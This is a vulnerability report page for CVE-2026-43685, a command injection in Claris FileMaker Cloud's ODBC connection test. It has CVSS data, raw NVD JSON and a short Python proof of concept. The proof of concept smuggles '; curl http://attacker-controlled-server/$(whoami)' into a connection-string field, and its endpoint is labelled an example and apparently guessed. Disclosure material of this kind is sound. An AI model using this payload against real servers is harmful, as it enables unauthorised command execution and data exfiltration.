Security Vulnerability Report
CVE-2026-43685 CVSS 7.2 HIGH

CVE-2026-43685

Published: 2026-05-12 23:16:18
Last Modified: 2026-05-14 13:52:51

Description

A Remote Code Execution vulnerability in Claris FileMaker Cloud allowed a user with Admin Console privileges to inject arbitrary operating system commands through unsanitized input in the External ODBC Data Source connection test feature. This issue is fixed in FileMaker Cloud 2.22.0.5.

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
Weakness
CWE-78 (OS Command Injection)

Configurations (Affected Products)

cpe:2.3:a:claris:filemaker_cloud:*:*:*:*:*:*:*:* - VULNERABLE
Claris FileMaker Cloud < 2.22.0.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Target URL (Example API endpoint for ODBC test)
target_url = "https://<filemaker-cloud-host>/admin/api/data-sources/test-connection"

# Malicious payload attempting command injection
# Example: using a semicolon to chain a command in Linux/Unix
cmd_payload = "; curl http://attacker-controlled-server/$(whoami)"

# Headers with admin session cookie (requires High Privilege)
headers = {
    "User-Agent": "Mozilla/5.0",
    "Cookie": "X-Claris-Session=valid_admin_session_token_here",
    "Content-Type": "application/json"
}

# Data payload targeting the ODBC connection string field
data = {
    "name": "ExploitDB",
    "type": "odbc",
    "connectionString": f"DRIVER={{MySQL}};SERVER=127.0.0.1{cmd_payload};DATABASE=test;"
}

try:
    # Send POST request to trigger the vulnerability
    response = requests.post(target_url, json=data, headers=headers, verify=False)
    if response.status_code == 200:
        print("[+] Request sent successfully. Check if command executed.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[!] Error: {e}")

References

Vendor Advisory: https://support.claris.com/s/answerview?anum=000049154&language=en_US

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-43685",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-12T23:16:17.973",
    "lastModified": "2026-05-14T13:52:51.037",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "A Remote Code Execution vulnerability in Claris FileMaker Cloud allowed a user with Admin Console privileges to inject arbitrary operating system commands through unsanitized input in the External ODBC Data Source connection test feature. This issue is fixed in FileMaker Cloud 2.22.0.5."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 7.2,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "HIGH",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 1.2,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-78"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:claris:filemaker_cloud:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "2.22.0.5",
                "matchCriteriaId": "A0DBAD4E-B906-4130-8D79-FBDD67974E60"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://support.claris.com/s/answerview?anum=000049154&language=en_US",
        "source": "[email protected]",
        "tags": [
          "Vendor Advisory"
        ]
      }
    ]
  }
}